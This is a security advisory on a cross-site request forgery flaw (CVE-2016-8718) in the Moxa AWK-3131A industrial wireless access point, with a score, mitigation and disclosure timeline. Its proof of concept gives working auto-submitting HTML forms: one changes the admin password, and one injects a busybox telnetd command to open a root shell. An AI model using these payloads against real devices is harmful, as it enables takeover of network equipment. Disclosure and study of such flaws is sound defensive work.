RootSSV:96541Moxa AWK-3131A Web Application Cross-Site Request Forgery Vulnerability(CVE-2016-8718)
0.001 Low
EPSS
Percentile
47.8%
Summary
An exploitable Cross-Site Request Forgery vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted form can trick a client into making an unintentional request to the web server which will be treated as an authentic request.
Tested Versions
Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1
Product URLs
http://www.moxa.com/product/AWK-3131A.htm
CVSSv3 Score
7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
Details
An exploitable Cross-Site Request Forgery (CSRF) vulnerability exists in the Web Application functionality of Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. A specially crafted form can trick a client into making an unintentional request to the web server which will be treated as an authentic request.
Successful exploitation of this vulnerability can enable an attacker to trick a legitimate user in to performing any action permitted by the device, including exploitation of unrelated vulnerabilities. For example, an attacker may use a CSRF attack to modify device settings or even take advantage of OS Command Injection vulnerabilities to execute operating system commands with root privileges.
Exploit Proof-of-Concept
The below will change the user’s password to a value determined by the attacker
<html>
<body>
<form action="http://<device IP>/forms/webSetUserChgPwd" method="POST">
<input type="hidden" name="NowPasswd" value="root" />
<input type="hidden" name="Passwd" value="hacked" />
<input type="hidden" name="ConfPasswd" value="hacked" />
<input type="hidden" name="Submit" value="Submit" />
<input type="hidden" name="UserName" value="admin" />
<input type="hidden" name="bkpath" value="/Password.asp" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Alternatively, leveraging an OS Command Injection vulnerability in conjunction with CSRF, a client which attempts to render the below page will cause a root-level shell to be opened on the vulnerable device:
<html>
<body>
<form action="http://<device IP>/forms/webSetPingTrace" method="POST">
<input type="hidden" name="srvName" value="; /bin/busybox telnetd -l/bin/sh -p9999" />
<input type="hidden" name="option" value="0" />
<input type="hidden" name="bkpath" value="/ping_trace.asp" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Mitigation
To significantly mitigate risk of exploitation, disable the web application before the device is deployed.
Timeline
- 2016-11-14 - Vendor Disclosure
- 2017-04-10 - Public Release
CREDIT
- Discovered by Patrick DeSantis of Cisco Talos.
<html>
<body>
<form action="http://<device IP>/forms/webSetUserChgPwd" method="POST">
<input type="hidden" name="NowPasswd" value="root" />
<input type="hidden" name="Passwd" value="hacked" />
<input type="hidden" name="ConfPasswd" value="hacked" />
<input type="hidden" name="Submit" value="Submit" />
<input type="hidden" name="UserName" value="admin" />
<input type="hidden" name="bkpath" value="/Password.asp" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Related
